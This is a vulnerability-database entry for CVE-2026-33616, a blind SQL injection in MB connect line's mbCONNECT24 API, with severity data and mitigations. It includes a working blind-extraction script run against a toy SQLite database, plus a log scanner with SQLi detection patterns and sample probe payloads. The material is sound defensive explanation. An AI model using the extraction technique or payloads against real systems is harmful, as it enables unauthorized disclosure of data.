Description
An unauthenticated remote attacker can exploit an unauthenticated blind SQL Injection vulnerability in the mb24api endpoint due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality.
Published: 2026-04-02
Score: 7.5 High
EPSS: < 1% Very Low
KEV: No
Impact: Confidentiality breach
Action: Patch ASAP
AI Analysis

Impact

The vulnerability is an unauthenticated blind SQL injection in the mb24api endpoint of MB connect line's mbCONNECT24 and mymbCONNECT24. User-supplied input reaches a SQL SELECT statement without proper neutralization of special elements (CWE-89), so a remote attacker can change the logic of the query. Because the injection is blind, query results are not echoed back in the response; the attacker instead infers database contents one condition at a time from observable differences in the endpoint's behaviour (for example, whether a record matched or how long the request took). No credentials are required, so anyone who can reach the endpoint over the network can exploit it. The CVSS vector rates the outcome as a complete loss of confidentiality (C:H) of whatever the application's database account can read; integrity and availability are not assessed as affected (I:N/A:N).

Affected Systems

Products affected are mbCONNECT24 and mymbCONNECT24 from MB connect line. The advisory text reproduced here does not state which versions are affected, so administrators should consult the vendor advisory (CERT@VDE is the assigning CNA) for the affected and fixed version ranges rather than assume an installation is unaffected. The defect resides in the mb24api component, which handles external API calls.

Risk and Exploitability

The CVSS 3.1 base score of 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) indicates a high-severity vulnerability whose impact is confined to confidentiality. The EPSS probability is currently below 1% and the CVE is not in the CISA KEV catalog, so there is no evidence yet of exploitation in the wild; the SSVC assessment agrees (Exploitation: none) but rates the flaw as Automatable: yes, and the absence of any authentication requirement makes the endpoint an attractive target for opportunistic scanning. Exploitation would involve sending crafted parameter values to the network-exposed mb24api endpoint; since the endpoint does not authenticate callers, nothing has to be bypassed. With a blind injection the attacker does not receive query output directly, but recovers it by issuing many requests whose true/false predicates (or induced delays) reveal the data character by character. This is slower than a classic injection that returns rows, but it is routinely automated by off-the-shelf tooling and the end result is the same: any data the application's database account can read.

Generated by OpenCVE AI on April 2, 2026 at 10:20 UTC.
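To make the "blind" qualifier in the analysis above concrete, here is an added example; it is not code from this page or from MB connect line, and the table names, the devices lookup and the config.secret value are constructed for illustration. It builds an in-memory SQLite database, exposes a lookup whose only observable result is whether a row matched, and recovers a secret through that single bit per request. The same extraction is then run against a parameterized version of the query, which yields nothing.

```python
import sqlite3
from typing import Callable

# Constructed sample data (not from the affected product): a secret the
# attacker wants and a lookup table that the injectable SELECT runs against.
SECRET = "s3cr3t-token"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE devices (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO devices (name) VALUES ('router-1'), ('router-2');
        CREATE TABLE config (secret TEXT);
        """
    )
    conn.execute("INSERT INTO config (secret) VALUES (?)", (SECRET,))
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, name: str) -> bool:
    """Hypothetical injectable handler: the caller's value is spliced into
    the SELECT. The caller only learns whether a row matched, which is all a
    blind attacker needs (CWE-89 pattern, for illustration only)."""
    sql = f"SELECT id FROM devices WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn: sqlite3.Connection, name: str) -> bool:
    """Same lookup with the value passed as a bound parameter, so the
    database never interprets it as SQL."""
    row = conn.execute("SELECT id FROM devices WHERE name = ?", (name,)).fetchone()
    return row is not None


def blind_extract(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Boolean-based blind extraction: recover each character of the secret
    by a binary search over its code point, asking one yes/no question per
    request. Stops when substr() runs past the end of the string (NULL in
    SQLite, so every comparison is false and the search bottoms out at 0)."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                "x' OR unicode(substr((SELECT secret FROM config), "
                f"{pos}, 1)) > {mid} -- "
            )
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    conn = build_db()
    leaked = blind_extract(lambda p: vulnerable_lookup(conn, p))
    print("recovered via injectable handler:   ", repr(leaked))
    unleaked = blind_extract(lambda p: safe_lookup(conn, p))
    print("recovered via parameterized handler:", repr(unleaked))
```

Each character costs about seven requests (a binary search over 7-bit ASCII), so even a short secret produces a burst of near-identical requests that differ only in the position and threshold; that request pattern, rather than any error message, is what log monitoring for this class of flaw has to look for. safe_lookup differs from vulnerable_lookup only in binding the value as a parameter, which is the standard remedy for CWE-89; the page does not say how mb24api builds its queries, so this is the generic fix, not a description of the vendor's code.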

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the vendor patch as soon as MB connect line releases a fixed version of mbCONNECT24/mymbCONNECT24; check the CERT@VDE advisory for the fixed version numbers.
  • Until a fix is available, restrict network access to the mb24api endpoint (firewall, reverse-proxy allowlist or VPN), permitting only trusted hosts or IP ranges. The endpoint requires no authentication, so network reachability is the main risk factor.
  • Monitor API and web-server logs for requests to mb24api that carry SQL metacharacters, tautologies such as ' AND 1=1, time-delay functions, or bursts of near-identical requests from one source that differ only in a single predicate; blind extraction needs many such requests, so volume is a strong indicator. Failed-authentication counts are not a useful signal here, because the endpoint does not authenticate callers.
  • If a WAF or reverse proxy is in the path, add rules for common SQL injection patterns as a stopgap, and treat them as bypassable; the durable fix is the vendor's, parameterizing the affected SELECT rather than filtering input.
  • Segment the network so the database server is reachable only from the application host, and run the application's database account with the minimum read access it needs, to bound what an injection can disclose.

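As an added example of the log monitoring recommended above (not code from this page or from the vendor), the following scanner flags blind-SQLi probes against the API in ordinary access-log lines. The log lines are constructed, the /mb24api request path and the cmd/id parameter names are assumptions, and the indicators are generic heuristics for the request shapes a blind injection produces: boolean tautology pairs, time-delay functions, per-character extraction functions, and a quote followed by a comment sequence.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines standing in for the product's API
# log. The /mb24api path and the parameter names are assumed, not documented.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2026:10:20:01 +0000] "GET /mb24api?cmd=getDevice&id=17 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2026:10:20:02 +0000] "GET /mb24api?cmd=getDevice&id=18 HTTP/1.1" 200 509
203.0.113.7 - - [02/Apr/2026:10:21:00 +0000] "GET /mb24api?cmd=getDevice&id=17%27%20AND%201%3D1--%20 HTTP/1.1" 200 512
203.0.113.7 - - [02/Apr/2026:10:21:00 +0000] "GET /mb24api?cmd=getDevice&id=17%27%20AND%201%3D2--%20 HTTP/1.1" 200 37
203.0.113.7 - - [02/Apr/2026:10:21:02 +0000] "GET /mb24api?cmd=getDevice&id=17%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 37
203.0.113.7 - - [02/Apr/2026:10:21:09 +0000] "GET /mb24api?cmd=getDevice&id=17%27%20AND%20ASCII%28SUBSTRING%28%28SELECT%20user%28%29%29%2C1%2C1%29%29%3E64--%20 HTTP/1.1" 200 512
198.51.100.9 - - [02/Apr/2026:10:22:00 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

API_PATH = "/mb24api"  # assumed location of the endpoint

# Each indicator is a request shape typical of blind injection probing.
INDICATORS = [
    ("boolean-tautology", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\b", re.I)),
    ("char-extraction", re.compile(r"\b(?:ascii|unicode|substr(?:ing)?|mid)\s*\(", re.I)),
    ("sql-keyword", re.compile(r"\b(?:select|union|information_schema)\b", re.I)),
    ("quote-and-comment", re.compile(r"'.*?(?:--|/\*)", re.S)),
]


def scan_log(text: str) -> list:
    """Return one finding per API request whose decoded query string matches
    at least one indicator. Non-API requests are ignored."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["target"].startswith(API_PATH):
            continue
        # Decode once: attackers URL-encode metacharacters, and matching on the
        # decoded query keeps the patterns readable and harder to evade.
        decoded = unquote_plus(m["target"].partition("?")[2])
        reasons = [name for name, rx in INDICATORS if rx.search(decoded)]
        if reasons:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "size": m["size"], "reasons": reasons, "query": decoded,
            })
    return findings


def suspicious_ips(findings: list, min_hits: int = 3) -> list:
    """Sources with at least min_hits flagged requests. Blind extraction needs
    many near-identical requests, so volume from one address is the tell."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["ts"], h["size"], ",".join(h["reasons"]), "|", h["query"])
    print("suspicious sources:", suspicious_ips(hits))
```

Note the response sizes in the two tautology requests (512 for 1=1, 37 for 1=2): a pair of requests that differ only in the predicate and come back with different sizes is the boolean oracle itself, and is worth alerting on even when the payload evades the keyword patterns. The heuristics will also fire on legitimate values that happen to contain an apostrophe and a double dash, so tune min_hits and the indicator list to the traffic you actually see.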


Advisories

No advisories yet.

History

Thu, 02 Apr 2026 20:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Mbconnectline
                                      Mbconnectline mbconnect24
                                      Mbconnectline mymbconnect24
Vendors & Products                    Mbconnectline
                                      Mbconnectline mbconnect24
                                      Mbconnectline mymbconnect24

Thu, 02 Apr 2026 14:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc
                           {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 02 Apr 2026 09:30:00 +0000

Type          Values Removed   Values Added
Description                    An unauthenticated remote attacker can exploit an unauthenticated blind SQL Injection vulnerability in the mb24api endpoint due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality.
Title                          MB connect line mbCONNECT24 vulnerable to an unauthenticated SQL injection in the mb24api Endpoint
Weaknesses                     CWE-89
References
Metrics                        cvssV3_1
                               {'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}


MITRE

Status: PUBLISHED

Assigner: CERTVDE

Published:

Updated: 2026-04-02T13:08:18.951Z

Reserved: 2026-03-23T13:15:49.382Z

Link: CVE-2026-33616

Vulnrichment

Updated: 2026-04-02T13:08:15.347Z

NVD

Status : Awaiting Analysis

Published: 2026-04-02T10:16:17.080

Modified: 2026-04-03T16:10:52.680

Link: CVE-2026-33616

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-02T20:21:36Z

Weaknesses